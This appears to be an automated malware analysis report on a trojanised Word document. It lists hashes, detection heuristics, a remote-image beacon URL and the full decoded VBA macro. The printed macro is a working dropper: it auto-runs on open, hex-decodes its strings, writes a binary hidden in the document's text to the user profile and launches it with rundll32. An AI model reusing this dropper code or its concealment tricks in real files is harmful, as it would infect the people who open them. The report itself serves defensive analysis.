Malicious Office (OOXML) — malware analysis report

Static analysis result for SHA-256 1f76637bdb839db7…

MALICIOUS

Office (OOXML)

260.3 KB Created: 2014-11-05 12:44:00 UTC Authoring application: Microsoft Office Word 15.0000 First seen: 2020-12-25
MD5: cfb4be91d8546203ae602c0284126408 SHA-1: adf8fb385de26985ed8b40d09fbedccc0f42332e SHA-256: 1f76637bdb839db7b43be7284b9b6482827529ac14406659a373ab3521651a2f
266 Risk Score

Heuristics 9

  • ClamAV: Doc.Trojan.Xshell-6923080-0 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Trojan.Xshell-6923080-0
  • VBA project inside OOXML medium 4 related findings OOXML_VBA
    Document contains a VBA project — VBA macros present
  • Potential Shell call in VBA critical OLE_VBA_SHELL
    Potential Shell call in VBA
    Matched line in script
    Shell rdl
  • AutoOpen macro low OLE_VBA_AUTOOPEN
    AutoOpen macro
    Matched line in script
    Sub AutoOpen()
  • Auto_Open macro low OLE_VBA_AUTO
    Auto_Open macro
    Matched line in script
    Sub Auto_Open()
  • Environ() call (env variable access) low OLE_VBA_ENVIRON
    Environ() call (env variable access)
    Matched line in script
    pth = Environ(s2) & Chr(92)
  • Remote image (web beacon / tracking pixel) medium OOXML_IMAGE_BEACON
    Document references an external image URL — loads automatically on open, revealing IP address and timestamp to the server (used for phishing tracking and NTLM hash theft on corporate networks)
  • External relationship medium OOXML_EXTERNAL_REL
    External target in word/_rels/document.xml.rels: http://main.windowskernel14.com/spl/image/Opr122Opn.jpg
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL http://main.windowskernel14.com/spl/image/Opr122Opn.jpg OOXML external relationship
    • http://www.arabkids.com/__dec/filepart2.aspx/index.jpgIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/word/2010/wordprocessingCanvasIn document text (OOXML body / shared strings)
    • http://schemas.openxmlformats.org/markup-compatibility/2006In document text (OOXML body / shared strings)
    • http://schemas.openxmlformats.org/officeDocument/2006/relationshipsIn document text (OOXML body / shared strings)
    • http://schemas.openxmlformats.org/officeDocument/2006/mathIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/word/2010/wordprocessingDrawingIn document text (OOXML body / shared strings)
    • http://schemas.openxmlformats.org/drawingml/2006/wordprocessingDrawingIn document text (OOXML body / shared strings)
    • http://schemas.openxmlformats.org/wordprocessingml/2006/mainIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/word/2010/wordmlIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/word/2012/wordmlIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/word/2010/wordprocessingGroupIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/word/2010/wordprocessingInkIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/word/2006/wordmlIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/word/2010/wordprocessingShapeIn document text (OOXML body / shared strings)

Extracted artifacts 2

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source from OOXML) 2847 bytes
SHA-256: 7b63db6c10ffec8799a1cd6e10feba550e160d8adfdae84131be18c5a04644b1
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True

Attribute VB_Name = "Module1"
Sub Auto_Open()
    getPicture 1
End Sub
Sub AutoOpen()
    getPicture 1
End Sub











































































































Private Sub getPicture(Void As Integer)
bmw = "5553455250524F46494C45"
Dim s2 As String
ind = 1
While (ind < Len(bmw))
Dim bt As String
bt = Mid(bmw, ind, 2)
Dim tt As Integer
On Error Resume Next
ij = CLng("&H" & bt)
s2 = s2 + Chr(ij)
ind = ind + 2
Wend
pth = Environ(s2) & Chr(92)
s2 = ""
s1 = "5C70696333342E676966"
ind = 1
While (ind < Len(s1))
bt = Mid(s1, ind, 2)
On Error Resume Next
ij = CLng("&H" & bt)
s2 = s2 + Chr(ij)
ind = ind + 2
Wend
With ActiveDocument
qtr = 20
kit = qtr / 2
pik = 2
With .Range
f = FreeFile()
DoEvents
jot = "0"
With .TextRetrievalMode
anosh = "http://www.arabkids.com/__dec/filepart2.aspx/index.jpg"
dc = Mid(anosh, 26, 4)
xmt = Mid(anosh, 44, 1)
fnm = "~$"
Dim a As Byte
fnm = fnm & "cache.doc"
.IncludeHiddenText = True
azb = 5
End With
DoEvents
aea = azb + 5
For q = 1 To qtr
bb = bb + "0"
Next q
End With
poi = Mid(anosh, 35, 1)
aei = aea - 2
dc = "," & dc
With .Sections(pik)
DoEvents
With .Range
poi = poi & Chr(qtr * 5 + 11)
DoEvents
With .Font
.Hidden = False
End With
aaa = .Text
DoEvents
For p = qtr To azb Step -1
anosh = Str(p)
pcc = jot + xmt
lamb = Trim(anosh)
If (p < kit) Then
kml = pcc + jot
aaa = Replace(aaa, kml + lamb, bb)
Else
ss = pcc + lamb
aaa = Replace(aaa, ss, bb)
End If
bb = Mid(bb, 2)
Next p
ozodo = pth & fnm & dc
poi = poi & Chr(qtr * 5 + 5)
If (Mid(aaa, azb - 4, azb - 2)) = poi Then
ghos = True
.Text = "."
End If
End With
With ActiveDocument
With .Sections
If (ghos) Then
Open pth & fnm For Binary As f
aaa = Replace(Mid(aaa, aei), " ", "")
s2 = ""
s1 = "72756E646C6C333220"
ind = 1
DoEvents
While (ind < Len(s1))
bt = Mid(s1, ind, 2)
On Error Resume Next
ij = CLng("&H" & bt)
s2 = s2 + Chr(ij)
ind = ind + 2
Wend
rdl = s2 & ozodo
DoEvents
For i = 1 To Len(aaa) - 2 Step 2
On Error Resume Next
ch = "&H" + Mid(aaa, i, 2)
a = ch
Put #f, , a
Next i
Close #f
DoEvents
Shell rdl
End If
ctn = .Count
End With
For i = 1 To ctn
With ActiveDocument
With .Sections(i)
With .Range
With .Font
If (i < pik) Then
.Hidden = True
Else
.Hidden = False
End If
End With
End With
End With
End With
Next i
End With
End With
.Save
End With
End Sub
vbaProject_00.bin vba-project OOXML VBA project: word/vbaProject.bin 15872 bytes
SHA-256: 157d5c351f451bca1dbe81bc0cd70da372309b123079dc7b4552c8c574b95209
Detection
ClamAV: Doc.Trojan.Xshell-6923080-0
Obfuscation or payload: unlikely